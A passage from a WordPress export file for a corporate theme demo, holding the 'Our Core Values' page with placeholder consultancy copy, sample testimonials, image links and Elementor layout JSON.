mobile";i:4;s:29:"number_typography_font_family";i:4;s:27:"number_typography_font_size";i:4;s:29:"number_typography_font_weight";i:4;s:28:"title_typography_font_family";i:4;s:28:"title_typography_font_weight";i:4;s:28:"title_typography_line_height";i:4;}}}}s:13:"iiboxcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"image_boxes";i:1;}}s:5:"style";a:1:{s:21:"style_content_section";a:1:{s:6:"box_bg";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:10:"lbar_color";i:3;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:2:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;}}}}s:13:"itestimonials";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:20:"section_testimonials";a:3:{s:12:"testi_slider";i:1;s:5:"tshow";i:1;s:4:"loop";i:1;}}}}s:7:"imember";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:12:"member_image";i:4;s:11:"member_name";i:3;s:12:"member_extra";i:3;s:12:"social_share";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:10:"info_style";a:3:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:24:"job_typography_font_size";i:3;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:5:"align";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Core Values</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-core-values/</link>
		<pubDate>Tue, 08 Sep 2020 04:49:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=529</guid>
		<description></description>
		<content:encoded><![CDATA[what we offer	        <h3>Make Digital Marketing  Work For Your Business</h3>	    
		<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them.</p>		
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						01						<h4>Client Learning Programs</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box1-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						02						<h4>Partnership Ecosystem</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box2-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
						<p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>						<a href="#"> Explore More</a>					
						03						<h4>New Business Innovation</h4>					
					<img width="750" height="649" src="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/flip-box3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/flip-box3-1-300x260.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />				
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
	        the language of business	        <h3>Consultancy That Empowers You</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<a href="#our-philo">our philosophy</a>
				<a href="#our-mission">our mission</a>
				<a href="#our-vision">our vision</a>
										<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-value.jpg 750w, https://maxbizz.s3.amazonaws.com/images/image1-value-1-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Philosophy</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
										<img width="750" height="656" src="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/our-vision.jpg 750w, https://maxbizz.s3.amazonaws.com/images/our-vision-1-300x262.jpg 300w" sizes="(max-width: 750px) 100vw, 750px" />											
			<h4>Our Mission</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
										<img src="https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg" title="" alt="" />											
			<h4>Our Vision</h4>		
		<p>Our clients’ needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.</p>		
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Investment Management
				</h6>
								<p>We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.</p>
				<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 515.556 515.556"><path d="m0 274.226 176.549 176.886 339.007-338.672-48.67-47.997-290.337 290-128.553-128.552z"></path></svg>				
				<h6>
					Private Credit & Equity
				</h6>
								<p>We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.</p>
			<a href="#">Explore More </a>
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
				Exceptional Client Service 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				A Great Team and Winning Culture 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				A Commitment to Integrity, Fairness 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-values-home4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-values-home4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-values-home4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
	        testimonials	        <h3>What People Say About Us</h3>	    
											<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Mary Grey</h6>							Manager						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Samanta Fox</h6>							Designer						
			<iframe frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/maps?q=411%20University%20St%2C%20Seattle%2C%20USA&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near" title="411 University St, Seattle, USA" aria-label="411 University St, Seattle, USA"></iframe>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>529</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 04:49:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 04:49:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-core-values]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[531]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"db1842d","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"84cfb4a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"de37b10","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"2519f8f","elType":"column","settings":{"_column_size":50,"_inline_size":42},"elements":[{"id":"10ad2ad","elType":"widget","settings":{"sub":"what we offer","title":"Make Digital Marketing  Work For Your Business","header_size":"h3","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"subtitle_style":"is_line","stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"5aeaeb4","elType":"column","settings":{"_column_size":50,"_inline_size":58},"elements":[{"id":"3148f6f","elType":"widget","settings":{"editor":"<p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach. Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"87d4f34","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"b70b980","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"73c0a87","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box1.jpg","id":533},"number":"01","title":"Client Learning Programs","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"overlay_bg":"#061E2F"},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"bc54eaf","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2e00231","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box2.jpg","id":534},"number":"02","title":"Partnership Ecosystem","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"overlay_bg":"#061E2F"},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"36da7a0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a72089a","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box3.jpg","id":535},"number":"03","title":"New Business Innovation","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"overlay_bg":"#061E2F"},"elements":[],"widgetType":"iflip_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"4c9f589","elType":"section","settings":{"structure":"40","background_background":"classic","background_color":"#F5F5F5","padding":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"23a042a","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"b29ab89","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"0e7cc6c","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"3eaebc8","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"a146db1","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"7c66c5a","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false},{"id":"8a93a84","elType":"column","settings":{"_column_size":25,"_inline_size":null},"elements":[{"id":"7f8aa51","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":false}],"isInner":false},{"id":"076fd4b","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-value.jpg","id":540},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"87682dc","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"cf617aa","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"73","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"695bdb3","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"90b64c6","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"eb959a2","elType":"widget","settings":{"sub":"the language of business","title":"Consultancy That Empowers You","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#FFFFFF","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"df732f4","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"c95075f","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"512e7f1","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"0b4ba37","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"20a92cd","elType":"widget","settings":{"title_boxes":[{"_id":"228c623","titles":"our philosophy","title_link":"#our-philo"},{"_id":"71b96ee","titles":"our mission","title_link":"#our-mission"},{"titles":"our vision","title_link":"#our-vision","_id":"02bca8a"}],"radius_title":{"unit":"px","top":"3","right":"3","bottom":"0","left":"0","isLinked":false},"title_bg":"#FFFFFF33","title_active_color":"#1B1D21","title_active_bg":"#FFFFFF"},"elements":[],"widgetType":"itabtitle"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"25cec1f","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-philo","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"69079ef","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"e1703a9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-value.jpg","id":542},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"c7f2f31","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"797598f","elType":"widget","settings":{"title":"Our Philosophy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"06391c3","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ae1ab95","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#55BB53","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#55BB53","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"6444584","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#55BB53","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#55BB53","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"45d2a82","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"3076906","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-mission","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"d0c38ef","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"0a21f5d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/our-vision.jpg","id":1029},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"4554b13","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"ebcd194","elType":"widget","settings":{"title":"Our Mission","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0ef6c14","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6614930","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#55BB53","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#55BB53","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"61f0b81","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#55BB53","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#55BB53","title_typography_typography":"custom","title_typography_font_family":"Raleway","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400","title_typography_font_size":{"unit":"px","size":18,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"ed79a7d","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"dd17773","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-vision","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"49ce3f7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"fc1c0ad","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-home1.jpg","id":1026},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 